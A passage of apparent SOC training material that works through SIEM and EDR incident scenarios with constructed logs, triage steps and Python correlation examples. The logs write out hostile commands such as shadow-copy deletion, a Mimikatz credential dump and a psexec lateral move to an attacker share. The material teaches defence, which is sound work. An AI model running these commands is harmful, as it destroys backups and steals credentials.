o Timestamp: 29-08-2024 18:08:30 UTC

o Source IP: 192.168.101.15 (WIN-SERVER-05)

o Queried Domain: malicious-domain.com

o Event ID: DNS-7890


The DNS log reveals that WIN-SERVER-05 resolved the domain malicious-
domain.com just before the PowerShell command was executed, further
corroborating the malware infection scenario.

Step 4: Take Immediate Containment Actions

• Isolate Affected Hosts: Use the EDR platform to isolate WIN-SERVER-05,
WIN10-CLIENT05 and WIN-SERVER-06 from the network to prevent further
malware spread.

• Block Malicious Domain: Block the domain malicious-domain.com at the
network perimeter firewall to prevent further connections.

• Terminate Malicious Processes: Use the EDR to terminate any active
PowerShell processes running the suspicious commands on the affected hosts.

Step 5: Conduct a Root Cause Analysis

• Identify the Initial Compromise: The account izzmier appears to be the initial
vector for the attack. Investigate how this account was compromised (e.g.,
phishing, credential theft).

• Examine Host Forensics: Analyse logs from isolated hosts for signs of
persistence mechanisms (e.g., scheduled tasks, registry changes) or additional
malware that might have been deployed.

Step 6: Report Findings and Recommend Remediation

• Prepare an Incident Report: Document the incident details:

o Incident Description: Unauthorised PowerShell executions across
multiple hosts detected, indicating a malware infection.

o Affected Accounts: izzmier and potentially admin (compromised for
privilege escalation).

o Affected Hosts: WIN-SERVER-05, WIN10-CLIENT05, WIN-SERVER-06.

o Indicators of Compromise (IoCs): Malicious domain malicious-domain.com,
suspicious PowerShell command executions, unusual DNS queries.

o Containment Actions: Isolation of affected hosts, blocking malicious
domain, terminating malicious PowerShell processes.

• Recommendations:

o Reset credentials for compromised accounts.

o Implement PowerShell logging and script-blocking policies to prevent
unauthorised PowerShell usage.

o Conduct a network-wide scan for other potential infections.

o Review and update endpoint security configurations to prevent future
malware infections.

Scenario 5: Phishing Attack Detected Via Unusual Email Activity
Overview: The SIEM system generates an alert indicating a possible phishing attack,
detected by unusual email activity involving the mass sending of emails with suspicious
links. This is correlated with EDR logs showing the execution of an email client and a
web browser accessing known phishing domains.

Alert Details:

• Alert Name: Phishing Attack Detected via Unusual Email Activity

• Severity: Critical

• Source: EDR logs via SIEM integration

• Description: Multiple endpoints have been used to send emails containing links
to known phishing sites. This behaviour is consistent with phishing tactics used
by attackers to harvest credentials or deliver malware.

• Time of Alert: 29-08-2024 14:30:00 UTC

Log Data:

EDR Log Entry 1:

• Timestamp: 29-08-2024 14:25:05 UTC

• Endpoint: WIN10-CLIENT07

• User: izzmier

• Process: outlook.exe

• CommandLine: outlook.exe /send "phishing_email_template.oft"

• Action: Allowed

• Detection Method: User Behaviour Analytics (UBA)

• Threat ID: EDR-67101

• Severity: High

EDR Log Entry 2:

• Timestamp: 29-08-2024 14:26:45 UTC

• Endpoint: WIN-SERVER-08

• User: izzmier

• Process: chrome.exe

• CommandLine: chrome.exe --incognito "http://phishing-site.com/login"


• Action: Allowed

• Detection Method: Anomaly Detection

• Threat ID: EDR-67102

• Severity: Critical

EDR Log Entry 3:

• Timestamp: 29-08-2024 14:28:30 UTC

• Endpoint: WIN10-CLIENT08

• User: admin

• Process: powershell.exe

• CommandLine: powershell.exe -ExecutionPolicy Bypass -File "Send-PhishingEmails.ps1"

• Action: Allowed

• Detection Method: Behaviour Analysis

• Threat ID: EDR-67103

• Severity: Critical

SIEM Correlated Alert Log Entry:

• Timestamp: 29-08-2024 14:30:00 UTC

• Alert ID: SIEM-45678

• Alert Name: Phishing Attack Detected via Unusual Email Activity

• Source: EDR Logs

• Correlated Events: 3

• Affected Hosts: WIN10-CLIENT07, WIN-SERVER-08, WIN10-CLIENT08

• Correlated Threat ID: EDR-67101, EDR-67102, EDR-67103

• Correlation Rule: Detect mass email sending with suspicious links and
abnormal user behaviour indicative of phishing attacks

• Severity: Critical
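The correlation rule stated in the alert above, written out as an added example (not part of the original document and not any SIEM vendor's rule syntax): the three Scenario 5 EDR entries are re-created as constructed input, each is tagged with the phishing indicator it matches, and a SIEM-style alert is raised only when matching events from at least two distinct endpoints fall inside a ten-minute window. The window, host threshold, indicator logic and the `PHISHING_DOMAINS` list are assumptions; the same aggregate-then-alert shape fits Scenarios 6 and 8 with different indicator functions.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

SEVERITY_RANK = {"Low": 1, "Medium": 2, "High": 3, "Critical": 4}

# Known-bad domains as fed from threat intelligence; constructed list for this example.
PHISHING_DOMAINS = {"phishing-site.com"}


@dataclass
class EdrEvent:
    timestamp: datetime
    endpoint: str
    user: str
    process: str
    command_line: str
    threat_id: str
    severity: str


def parse_ts(text: str) -> datetime:
    """Parse the timestamp format used in the EDR entries, e.g. '29-08-2024 14:25:05 UTC'."""
    return datetime.strptime(text, "%d-%m-%Y %H:%M:%S UTC")


# Constructed input: the three Scenario 5 EDR log entries.
EDR_EVENTS = [
    EdrEvent(parse_ts("29-08-2024 14:25:05 UTC"), "WIN10-CLIENT07", "izzmier", "outlook.exe",
             'outlook.exe /send "phishing_email_template.oft"', "EDR-67101", "High"),
    EdrEvent(parse_ts("29-08-2024 14:26:45 UTC"), "WIN-SERVER-08", "izzmier", "chrome.exe",
             'chrome.exe --incognito "http://phishing-site.com/login"', "EDR-67102", "Critical"),
    EdrEvent(parse_ts("29-08-2024 14:28:30 UTC"), "WIN10-CLIENT08", "admin", "powershell.exe",
             'powershell.exe -ExecutionPolicy Bypass -File "Send-PhishingEmails.ps1"', "EDR-67103", "Critical"),
]


def phishing_indicator(event: EdrEvent):
    """Return the name of the phishing indicator an event matches, or None."""
    proc = event.process.lower()
    cmd = event.command_line.lower()
    if proc == "outlook.exe" and "/send" in cmd:
        return "mass_email_send"
    # Match the domain as a whole host label so 'notphishing-site.com' does not hit.
    for domain in PHISHING_DOMAINS:
        if re.search(r"(?<![\w.-])" + re.escape(domain) + r"(?![\w-])", cmd):
            return "phishing_domain_access"
    if proc == "powershell.exe" and "-executionpolicy bypass" in cmd and "-file" in cmd:
        return "script_execution_policy_bypass"
    return None


def correlate_phishing(events, window=timedelta(minutes=10), min_hosts=2):
    """Raise one alert per group of indicator hits spanning >= min_hosts endpoints within `window`."""
    matched = sorted((e for e in events if phishing_indicator(e)), key=lambda e: e.timestamp)
    alerts = []
    i = 0
    while i < len(matched):
        start = matched[i].timestamp
        group = [e for e in matched[i:] if e.timestamp - start <= window]
        hosts = {e.endpoint for e in group}
        if len(hosts) >= min_hosts:
            alerts.append({
                "alert_name": "Phishing Attack Detected via Unusual Email Activity",
                "correlated_events": len(group),
                "affected_hosts": sorted(hosts),
                "correlated_threat_ids": [e.threat_id for e in group],
                "indicators": sorted({phishing_indicator(e) for e in group}),
                "severity": max((e.severity for e in group), key=SEVERITY_RANK.__getitem__),
            })
            i += len(group)  # events already in an alert are not alerted on again
        else:
            i += 1
    return alerts


if __name__ == "__main__":
    for alert in correlate_phishing(EDR_EVENTS):
        print(alert)
```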

Analysis:

Step 1: Initial Triage

• Check the Alert Details:
The SIEM alert "Phishing Attack Detected via Unusual Email Activity" is flagged
as Critical, indicating a severe security incident. The source is EDR logs showing
unauthorised email sending and web access to phishing sites across multiple
endpoints.

• Review Correlated Events:
The alert aggregates three EDR events, each involving suspicious activity,
including mass email sending and browsing to a known phishing domain.

Step 2: Investigate EDR Logs

• Examine the Command Line Fields:

o Log Entry 1: outlook.exe /send "phishing_email_template.oft" was executed on
WIN10-CLIENT07 by user izzmier, indicating that a pre-prepared phishing email
template was used to send out emails, a common tactic in phishing campaigns.

o Log Entry 2: chrome.exe --incognito "http://phishing-site.com/login" was executed
on WIN-SERVER-08 by user izzmier, showing that the user accessed a known
phishing site in incognito mode, likely for testing or further malicious activity.

o Log Entry 3: powershell.exe -ExecutionPolicy Bypass -File "Send-PhishingEmails.ps1"
was executed on WIN10-CLIENT08 by user admin, indicating the use of a PowerShell
script to automate the sending of phishing emails.

Step 3: Correlate with Additional SIEM Data

• Correlate with Email Gateway Logs:

o Timestamp: 29-08-2024 14:24:30 UTC

o Source IP: 192.168.102.17 (WIN10-CLIENT07)

o Destination Email Addresses: Multiple external addresses

o Subject: "Urgent: Action Required"

o Attachment: phishing_email_template.oft

o Event ID: EMAIL-1234

The email gateway log confirms that emails with a suspicious subject line
and attachment were sent to multiple external recipients from WIN10-CLIENT07.

• Check Web Proxy Logs:

o Timestamp: 29-08-2024 14:26:15 UTC

o Source IP: 192.168.102.20 (WIN-SERVER-08)

o Destination URL: http://phishing-site.com/login

o Action: Allowed

o Event ID: WEB-5678

The web proxy log shows that WIN-SERVER-08 accessed a known
phishing site, further supporting the phishing attack scenario.

Step 4: Take Immediate Containment Actions

• Isolate Affected Hosts: Use the EDR platform to isolate WIN10-CLIENT07,
WIN-SERVER-08 and WIN10-CLIENT08 from the network to prevent further email
sending and web access.

• Quarantine Malicious Emails: Use the email gateway to quarantine and delete
any phishing emails sent from WIN10-CLIENT07.

• Block Phishing Domain: Block the domain phishing-site.com at the network
perimeter firewall to prevent further access.

Step 5: Conduct a Root Cause Analysis

• Identify the Initial Compromise: The account izzmier appears to be the initial
vector for the phishing attack. Investigate how this account was compromised
(e.g., spear-phishing, credential theft).

• Examine Host Forensics: Analyse logs from isolated hosts for signs of
persistence mechanisms (e.g., registry changes, scheduled tasks) or additional
malware that might have been deployed.

Step 6: Report Findings and Recommend Remediation

• Prepare an Incident Report: Document the incident details:

o Incident Description: Unauthorised email sending and web access to
phishing domains detected, indicating a phishing attack.

o Affected Accounts: izzmier and potentially admin (compromised for
privilege escalation).

o Affected Hosts: WIN10-CLIENT07, WIN-SERVER-08, WIN10-CLIENT08.

o Indicators of Compromise (IoCs): Known phishing domain phishing-site.com,
suspicious email template phishing_email_template.oft, unusual PowerShell
script execution.

o Containment Actions: Isolation of affected hosts, quarantine of malicious
emails, blocking of phishing domain.

• Recommendations:

o Reset credentials for compromised accounts.

o Implement email filtering and anti-phishing tools to detect and block
phishing emails.

o Conduct an organisation-wide awareness campaign on phishing risks and
prevention.

o Review and update endpoint security policies to prevent unauthorised
email sending and script execution.

Scenario 6: Ransomware Attack Detected Via Unusual File Encryption Activity
Overview: The SIEM system generates an alert indicating a potential ransomware
attack, detected by unusual file encryption activity on multiple endpoints. This is
correlated with EDR logs showing the execution of suspicious processes that are known
to be associated with ransomware behaviour.

Alert Details:

• Alert Name: Ransomware Attack Detected via Unusual File Encryption Activity

• Severity: Critical

• Source: EDR logs via SIEM integration

• Description: Multiple endpoints have initiated file encryption processes. The
behaviour matches known ransomware tactics used by attackers to encrypt files
and demand ransom.

• Time of Alert: 29-08-2024 16:00:00 UTC

Log Data:

EDR Log Entry 1:

• Timestamp: 29-08-2024 15:55:10 UTC

• Endpoint: WIN10-CLIENT09

• User: izzmier

• Process: vssadmin.exe

• CommandLine: vssadmin.exe delete shadows /all /quiet

• Action: Allowed

• Detection Method: User Behaviour Analytics (UBA)

• Threat ID: EDR-89101

• Severity: High

EDR Log Entry 2:

• Timestamp: 29-08-2024 15:57:30 UTC

• Endpoint: WIN-SERVER-09

• User: izzmier

• Process: cryptoware.exe

• CommandLine: cryptoware.exe /encrypt C:\Users\Documents

• Action: Allowed

• Detection Method: Anomaly Detection

• Threat ID: EDR-89102

• Severity: Critical

EDR Log Entry 3:

• Timestamp: 29-08-2024 15:59:45 UTC

• Endpoint: WIN10-CLIENT10

• User: admin

• Process: powershell.exe

• CommandLine: powershell.exe -ExecutionPolicy Bypass -File "Start-Ransomware.ps1"

• Action: Allowed

• Detection Method: Behaviour Analysis

• Threat ID: EDR-89103

• Severity: Critical

SIEM Correlated Alert Log Entry:

• Timestamp: 29-08-2024 16:00:00 UTC

• Alert ID: SIEM-78901

• Alert Name: Ransomware Attack Detected via Unusual File Encryption Activity

• Source: EDR Logs

• Correlated Events: 3

• Affected Hosts: WIN10-CLIENT09, WIN-SERVER-09, WIN10-CLIENT10

• Correlated Threat ID: EDR-89101, EDR-89102, EDR-89103

• Correlation Rule: Detect file encryption activity and known ransomware-related
process execution

• Severity: Critical

Analysis:

Step 1: Initial Triage

• Check the Alert Details:
The SIEM alert "Ransomware Attack Detected via Unusual File Encryption
Activity" is flagged as Critical, indicating a severe security incident. The source is
EDR logs showing file encryption processes initiated on multiple endpoints,
consistent with ransomware behaviour.

• Review Correlated Events:
The alert aggregates three EDR events, each involving suspicious activity related
to file encryption and deletion of shadow copies.

Step 2: Investigate EDR Logs

• Examine the Command Line Fields:

o Log Entry 1: vssadmin.exe delete shadows /all /quiet was executed on
WIN10-CLIENT09 by user izzmier, indicating the deletion of shadow
copies, a common tactic used by ransomware to prevent file recovery.

o Log Entry 2: cryptoware.exe /encrypt C:\Users\Documents was executed
on WIN-SERVER-09 by user izzmier, showing that a known ransomware
executable was used to encrypt files in the Documents folder.

o Log Entry 3: powershell.exe -ExecutionPolicy Bypass -File "Start-Ransomware.ps1"
was executed on WIN10-CLIENT10 by user admin, indicating the execution of a
PowerShell script to start the ransomware attack.

Step 3: Correlate with Additional SIEM Data

• Correlate with File Integrity Monitoring Logs:

o Timestamp: 29-08-2024 15:58:00 UTC

o Source IP: 192.168.103.17 (WIN-SERVER-09)

o File Path: C:\Users\Documents\Encrypted_File.docx

o Action: Modified

o Event ID: FIM-3456


The file integrity monitoring log shows that files in the Documents folder
on WIN-SERVER-09 were encrypted, confirming ransomware activity.

• Check Network Traffic Logs:

o Timestamp: 29-08-2024 15:59:00 UTC

o Source IP: 192.168.103.20 (WIN10-CLIENT10)

o Destination IP: 203.0.113.20

o Protocol: HTTPS

o Action: Allowed

o Event ID: NET-7890


The network traffic log shows an outbound HTTPS connection from
WIN10-CLIENT10 to an external IP, which could be used to exfiltrate
encryption keys or communicate with a command-and-control (C2)
server.

Step 4: Take Immediate Containment Actions

• Isolate Affected Hosts: Use the EDR platform to isolate WIN10-CLIENT09,
WIN-SERVER-09 and WIN10-CLIENT10 from the network to prevent further file
encryption and spread of the ransomware.

• Disable Network Shares: Disable network shares on affected servers to prevent
the ransomware from spreading to other systems.

• Block External IPs: Block the external IP (203.0.113.20) at the network
perimeter firewall to prevent communication with the ransomware’s C2 server.

Step 5: Conduct a Root Cause Analysis

• Identify the Initial Compromise: The account izzmier appears to be the initial
vector for the ransomware attack. Investigate how this account was
compromised (e.g., phishing, drive-by download, exploitation of vulnerabilities).

• Examine Host Forensics: Analyse logs from isolated hosts for signs of
persistence mechanisms (e.g., registry changes, new scheduled tasks) or
additional malware that might have been deployed alongside the ransomware.

Step 6: Report Findings and Recommend Remediation

• Prepare an Incident Report: Document the incident details:

o Incident Description: Unauthorised file encryption detected on multiple
hosts, indicating a ransomware attack.

o Affected Accounts: izzmier and potentially admin (compromised for
privilege escalation).

o Affected Hosts: WIN10-CLIENT09, WIN-SERVER-09, WIN10-CLIENT10.

o Indicators of Compromise (IoCs): Known ransomware executable cryptoware.exe,
suspicious PowerShell script Start-Ransomware.ps1, deletion of shadow copies.

o Containment Actions: Isolation of affected hosts, disabling of network
shares, blocking of external IPs.

• Recommendations:

o Restore encrypted files from backups, if available.

o Reset credentials for compromised accounts.

o Implement ransomware protection tools, such as application whitelisting
and advanced endpoint detection.

o Conduct an organisation-wide audit of security controls to identify and
close any gaps.

o Provide training to users on the dangers of ransomware and how to avoid
falling victim to phishing attacks.

Scenario 7: Unauthorised Access Detected Via VPN Connection
Overview: The SIEM system generates an alert indicating unauthorised access to the
network via a VPN connection. The alert is correlated with EDR logs showing suspicious
activity on a remote endpoint after the VPN connection was established, potentially
indicating that a compromised account or a malicious actor has gained access.

Alert Details:

• Alert Name: Unauthorised Access Detected via VPN Connection

• Severity: High

• Source: VPN logs via SIEM integration

• Description: A VPN connection was established from an unusual geographic
location using valid credentials. This was followed by abnormal activity on the
connected endpoint, indicating possible unauthorised access.

• Time of Alert: 29-08-2024 18:30:00 UTC

Log Data:

VPN Log Entry:

• Timestamp: 29-08-2024 18:20:00 UTC

• User: izzmier

• Source IP: 203.0.113.100 (Unusual Location: South America)

• Destination: Corporate Network

• VPN Client: OpenVPN

• Authentication Method: Username/Password

• VPN Session ID: VPN-65432

• Action: Connection Established

• Severity: Medium

EDR Log Entry 1:

• Timestamp: 29-08-2024 18:25:15 UTC

• Endpoint: WIN-SERVER-15

• User: izzmier

• Process: powershell.exe

• CommandLine: powershell.exe -ExecutionPolicy Bypass -File "Invoke-DataExfiltration.ps1"

• Action: Allowed

• Detection Method: Behaviour Analysis

• Threat ID: EDR-90876

• Severity: High

EDR Log Entry 2:

• Timestamp: 29-08-2024 18:27:40 UTC

• Endpoint: WIN-SERVER-15

• User: izzmier

• Process: mimikatz.exe

• CommandLine: mimikatz.exe privilege::debug sekurlsa::logonpasswords

• Action: Allowed

• Detection Method: User Behaviour Analytics (UBA)

• Threat ID: EDR-90877

• Severity: Critical

SIEM Correlated Alert Log Entry:

• Timestamp: 29-08-2024 18:30:00 UTC

• Alert ID: SIEM-12034

• Alert Name: Unauthorised Access Detected via VPN Connection

• Source: VPN Logs

• Correlated Events: 2

• Affected Hosts: WIN-SERVER-15

• Correlated Threat ID: EDR-90876, EDR-90877

• Correlation Rule: Detect suspicious VPN access followed by abnormal
activities on connected endpoints

• Severity: High
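The sequence rule named above differs from the earlier scenarios in that it chains two sources in order: a VPN login from a location the account has not used before, then EDR detections for the same account within a short window. The following is an added example (not part of the original document, not the SIEM's own rule language); the Scenario 7 VPN and EDR entries are re-created as constructed input, and the `USUAL_LOCATIONS` baseline, the 15-minute window and the severity floor are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

SEVERITY_RANK = {"Low": 1, "Medium": 2, "High": 3, "Critical": 4}


@dataclass
class VpnEvent:
    timestamp: datetime
    user: str
    source_ip: str
    location: str
    session_id: str
    action: str


@dataclass
class EdrEvent:
    timestamp: datetime
    endpoint: str
    user: str
    process: str
    threat_id: str
    severity: str


def parse_ts(text: str) -> datetime:
    return datetime.strptime(text, "%d-%m-%Y %H:%M:%S UTC")


# Constructed baseline: locations each account has connected from during a learning period.
# The page only states that South America is unusual for izzmier; the value here is an assumption.
USUAL_LOCATIONS = {"izzmier": {"Asia"}}

# Constructed input: the Scenario 7 VPN entry and its two EDR entries.
VPN_EVENTS = [
    VpnEvent(parse_ts("29-08-2024 18:20:00 UTC"), "izzmier", "203.0.113.100", "South America",
             "VPN-65432", "Connection Established"),
]
EDR_EVENTS = [
    EdrEvent(parse_ts("29-08-2024 18:25:15 UTC"), "WIN-SERVER-15", "izzmier", "powershell.exe", "EDR-90876", "High"),
    EdrEvent(parse_ts("29-08-2024 18:27:40 UTC"), "WIN-SERVER-15", "izzmier", "mimikatz.exe", "EDR-90877", "Critical"),
]


def is_unusual_location(vpn: VpnEvent, baseline=USUAL_LOCATIONS) -> bool:
    """True when the connecting location is outside the account's learned baseline."""
    return vpn.location not in baseline.get(vpn.user, set())


def correlate_vpn_then_edr(vpn_events, edr_events, baseline=USUAL_LOCATIONS,
                           window=timedelta(minutes=15), min_severity="High"):
    """Unusual-location VPN login followed, within `window`, by EDR detections of at least
    `min_severity` for the same account. Assumes the EDR 'User' field and the VPN username
    name the same principal; normalise both (domain prefix, case) before comparing in practice."""
    alerts = []
    for vpn in vpn_events:
        if vpn.action != "Connection Established" or not is_unusual_location(vpn, baseline):
            continue
        followers = sorted(
            (e for e in edr_events
             if e.user == vpn.user
             and vpn.timestamp <= e.timestamp <= vpn.timestamp + window
             and SEVERITY_RANK[e.severity] >= SEVERITY_RANK[min_severity]),
            key=lambda e: e.timestamp,
        )
        if followers:
            alerts.append({
                "alert_name": "Unauthorised Access Detected via VPN Connection",
                "vpn_session_id": vpn.session_id,
                "source_ip": vpn.source_ip,
                "user": vpn.user,
                "affected_hosts": sorted({e.endpoint for e in followers}),
                "correlated_threat_ids": [e.threat_id for e in followers],
                "severity": max((e.severity for e in followers), key=SEVERITY_RANK.__getitem__),
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate_vpn_then_edr(VPN_EVENTS, EDR_EVENTS):
        print(alert)
```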

Analysis:

Step 1: Initial Triage

• Check the Alert Details:
The SIEM alert "Unauthorised Access Detected via VPN Connection" is flagged
as High, indicating a potential security breach. The source is VPN logs showing a
connection from an unusual location, followed by suspicious activity on an
internal server.

• Review Correlated Events:
The alert aggregates two EDR events involving the execution of potentially
malicious PowerShell and Mimikatz processes on the connected endpoint,
WIN-SERVER-15.

Step 2: Investigate EDR Logs

• Examine the Command Line Fields:

o Log Entry 1: powershell.exe -ExecutionPolicy Bypass -File "Invoke-DataExfiltration.ps1"
was executed on WIN-SERVER-15 by user izzmier. This command suggests that a
script intended for data exfiltration was executed, which is a significant red flag.

o Log Entry 2: mimikatz.exe privilege::debug sekurlsa::logonpasswords was
executed on the same server by the same user, indicating an attempt to
dump credentials using a well-known post-exploitation tool, Mimikatz.

Step 3: Correlate with Additional SIEM Data

• Correlate with Authentication Logs:

o Timestamp: 29-08-2024 18:18:00 UTC

o Source IP: 203.0.113.100 (Unusual Location)

o Destination: Corporate Network

o User: izzmier

o Action: Successful Login

o Event ID: AUTH-6789


The authentication log confirms that the izzmier account was used to
successfully log in from an unusual geographic location, reinforcing the
suspicion of account compromise.

• Check Data Transfer Logs:

o Timestamp: 29-08-2024 18:28:30 UTC

o Source IP: 192.168.50.25 (WIN-SERVER-15)

o Destination IP: 203.0.113.200

o Protocol: FTP

o Action: Data Transfer

o Event ID: NET-4567


The data transfer log shows a significant amount of data being transferred
from WIN-SERVER-15 to an external IP, which could be an indication of
data exfiltration.

Step 4: Take Immediate Containment Actions

• Terminate VPN Session: Immediately disconnect the VPN session associated
with izzmier to prevent further unauthorised access.

• Isolate WIN-SERVER-15: Use the EDR platform to isolate WIN-SERVER-15 from
the network to prevent further malicious activity and potential data exfiltration.

• Block External IP: Block the external IP addresses (203.0.113.100 and
203.0.113.200) at the network perimeter firewall to prevent any further
communication or data transfer.

Step 5: Conduct a Root Cause Analysis

• Identify the Initial Compromise: Investigate how the izzmier account was
compromised, focusing on the possibility of credential theft or phishing.

• Examine Host Forensics: Analyse logs from WIN-SERVER-15 for additional
indicators of compromise (e.g., registry changes, persistence mechanisms,
other malicious tools) to understand the full scope of the attack.

Step 6: Report Findings and Recommend Remediation

• Prepare an Incident Report: Document the incident details:

o Incident Description: Unauthorised access detected via VPN, followed
by suspicious activities indicative of credential theft and potential data
exfiltration.

o Affected Account: izzmier (likely compromised).

o Affected Host: WIN-SERVER-15.

o Indicators of Compromise (IoCs): VPN connection from unusual
location, execution of Mimikatz and data exfiltration scripts.

o Containment Actions: Termination of VPN session, isolation of affected
host, blocking of external IPs.

• Recommendations:

o Reset credentials for the compromised account (izzmier) and enforce
multi-factor authentication (MFA) for all VPN connections.

o Conduct a thorough audit of all accounts and logs to identify any further
unauthorised access or compromised accounts.

o Review and strengthen VPN access policies, ensuring geographic-based
access restrictions are in place.

o Provide additional training to users on recognising phishing attempts and
secure remote access practices.

Scenario 8: Malware Detected In Email Attachment With Lateral Movement
Overview: The SIEM system generates an alert indicating that malware was detected in
an email attachment. This was followed by suspicious lateral movement across
multiple endpoints, indicating the potential spread of the malware within the network.
The alert is correlated with EDR logs showing the execution of the malicious file and
subsequent unauthorised access attempts on other systems.

Alert Details:

• Alert Name: Malware Detected in Email Attachment with Lateral Movement

• Severity: Critical

• Source: Email security gateway and EDR logs via SIEM integration

• Description: A malicious file was detected and executed from an email
attachment, leading to unauthorised access attempts on other networked
systems, indicating possible malware propagation.

• Time of Alert: 29-08-2024 15:15:00 UTC

Log Data:

Email Security Gateway Log Entry:

• Timestamp: 29-08-2024 15:00:00 UTC

• Sender: [email protected]

• Recipient: [email protected]

• Subject: Urgent: Invoice Due

• Attachment: Invoice_Due.docx (contains embedded malware)

• Action: Attachment Detected and Blocked

• Threat ID: EMAIL-56789

• Severity: High

EDR Log Entry 1:

• Timestamp: 29-08-2024 15:05:30 UTC

• Endpoint: WIN-CLIENT-01

• User: izzmier

• Process: winword.exe

• CommandLine: winword.exe /safe "C:\Users\izzmier\Downloads\Invoice_Due.docx"

• Action: Allowed

• Detection Method: File Hash Analysis

• Threat ID: EDR-43210

• Severity: High

EDR Log Entry 2:

• Timestamp: 29-08-2024 15:08:45 UTC

• Endpoint: WIN-CLIENT-01

• User: izzmier

• Process: powershell.exe

• CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Temp\payload.ps1"

• Action: Allowed

• Detection Method: Behaviour Analysis

• Threat ID: EDR-43211

• Severity: Critical

EDR Log Entry 3:

• Timestamp: 29-08-2024 15:12:20 UTC

• Endpoint: WIN-SERVER-03

• User: izzmier

• Process: psexec.exe

• CommandLine: psexec.exe \\WIN-SERVER-03 -u admin -p password123 cmd.exe /c "net use z: \\attacker\share"

• Action: Allowed

• Detection Method: Anomaly Detection

• Threat ID: EDR-43212

• Severity: Critical

SIEM Correlated Alert Log Entry:

• Timestamp: 29-08-2024 15:15:00 UTC

• Alert ID: SIEM-78654

• Alert Name: Malware Detected in Email Attachment with Lateral Movement

• Source: Email Security Gateway and EDR Logs

• Correlated Events: 3

• Affected Hosts: WIN-CLIENT-01, WIN-SERVER-03

• Correlated Threat ID: EDR-43210, EDR-43211, EDR-43212

• Correlation Rule: Detect malicious file execution and subsequent suspicious
activities indicative of lateral movement

• Severity: Critical

Analysis:

Step 1: Initial Triage

• Check the Alert Details:
The SIEM alert "Malware Detected in Email Attachment with Lateral Movement"
is flagged as Critical, signalling a potentially severe security incident. The alert
originates from a combination of email security and EDR logs, indicating that a
malicious attachment was executed, followed by suspicious lateral movement.

• Review Correlated Events:
The alert aggregates three EDR events, each involving the execution of potentially
malicious processes and unauthorised access attempts across two endpoints
(WIN-CLIENT-01 and WIN-SERVER-03).

Step 2: Investigate EDR Logs

• Examine the Command Line Fields:

o Log Entry 1: winword.exe /safe "C:\Users\izzmier\Downloads\Invoice_Due.docx"
was executed on WIN-CLIENT-01 by user izzmier. This indicates that the user
opened the malicious document, which likely triggered the malware execution.

o Log Entry 2: powershell.exe -ExecutionPolicy Bypass -File "C:\Temp\payload.ps1"
suggests that a PowerShell script was executed, likely as part of the malware’s
payload to perform further malicious actions.

o Log Entry 3: psexec.exe \\WIN-SERVER-03 -u admin -p password123
cmd.exe /c "net use z: \\attacker\share" was executed, indicating that the
malware attempted to use PsExec to spread to another server and
connect to an external malicious share.

Step 3: Correlate with Additional SIEM Data

• Correlate with Email Logs:

o Timestamp: 29-08-2024 15:00:00 UTC

o Sender: [email protected]

o Recipient: [email protected]

o Subject: Urgent: Invoice Due

o Attachment: Invoice_Due.docx

o Action: Attachment Blocked (though likely bypassed)


The email log confirms that the malware originated from a spear-phishing
email targeting izzmier.

• Check Network Traffic Logs:

o Timestamp: 29-08-2024 15:10:30 UTC

o Source IP: 192.168.50.10 (WIN-CLIENT-01)

o Destination IP: 203.0.113.200

o Protocol: SMB

o Action: Data Transfer Attempted

o Event ID: NET-11234


The network traffic log shows an attempted connection to an external IP,
indicating that the malware might have tried to exfiltrate data.
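The email log above reports the attachment as blocked, yet five minutes later EDR records the same file being opened on the recipient's endpoint. That contradiction is worth detecting on its own, since it means a preventive control reported success while the artefact still reached a host. The following is an added example (not part of the original document) that re-creates the Scenario 8 gateway and EDR entries as constructed input and pairs every "blocked" verdict with any later EDR command line naming that file; the one-hour window is an assumption.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class GatewayEvent:
    timestamp: datetime
    attachment: str
    action: str
    threat_id: str


@dataclass
class EdrEvent:
    timestamp: datetime
    endpoint: str
    user: str
    command_line: str
    threat_id: str


def parse_ts(text: str) -> datetime:
    return datetime.strptime(text, "%d-%m-%Y %H:%M:%S UTC")


# Constructed input: the Scenario 8 email security gateway entry and two EDR entries.
GATEWAY_EVENTS = [
    GatewayEvent(parse_ts("29-08-2024 15:00:00 UTC"), "Invoice_Due.docx",
                 "Attachment Detected and Blocked", "EMAIL-56789"),
]
EDR_EVENTS = [
    EdrEvent(parse_ts("29-08-2024 15:05:30 UTC"), "WIN-CLIENT-01", "izzmier",
             r'winword.exe /safe "C:\Users\izzmier\Downloads\Invoice_Due.docx"', "EDR-43210"),
    EdrEvent(parse_ts("29-08-2024 15:08:45 UTC"), "WIN-CLIENT-01", "izzmier",
             r'powershell.exe -ExecutionPolicy Bypass -File "C:\Temp\payload.ps1"', "EDR-43211"),
]


def file_names_in(command_line: str):
    """Lower-cased base names of every quoted or bare token on a Windows command line."""
    names = set()
    for quoted, bare in re.findall(r'"([^"]+)"|(\S+)', command_line):
        path = quoted or bare
        names.add(path.replace("/", "\\").rsplit("\\", 1)[-1].lower())
    return names


def blocked_attachments_that_ran(gateway_events, edr_events, window=timedelta(hours=1)):
    """Pair a gateway 'blocked' verdict with a later EDR event whose command line names the
    same file. Each finding points at a control that reported success but did not hold."""
    findings = []
    for g in gateway_events:
        if "blocked" not in g.action.lower():
            continue
        for e in edr_events:
            if not (g.timestamp <= e.timestamp <= g.timestamp + window):
                continue
            if g.attachment.lower() in file_names_in(e.command_line):
                findings.append({
                    "attachment": g.attachment,
                    "gateway_threat_id": g.threat_id,
                    "edr_threat_id": e.threat_id,
                    "endpoint": e.endpoint,
                    "user": e.user,
                    "delay_seconds": int((e.timestamp - g.timestamp).total_seconds()),
                })
    return findings


if __name__ == "__main__":
    for finding in blocked_attachments_that_ran(GATEWAY_EVENTS, EDR_EVENTS):
        print(finding)
```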

Step 4: Take Immediate Containment Actions

• Isolate Affected Hosts: Use the EDR platform to immediately isolate
WIN-CLIENT-01 and WIN-SERVER-03 from the network to prevent further spread of
the malware.

• Quarantine Malicious Files: Quarantine the malicious document
(Invoice_Due.docx) and the PowerShell script (payload.ps1) on all affected
systems.

• Block External IP Addresses: Block the external IP address (203.0.113.200) at
the network perimeter firewall to prevent any potential data exfiltration.

Step 5: Conduct a Root Cause Analysis

• Identify the Initial Compromise: Investigate how the email security system
allowed the malicious attachment to reach the end user despite detection and
blocking attempts.

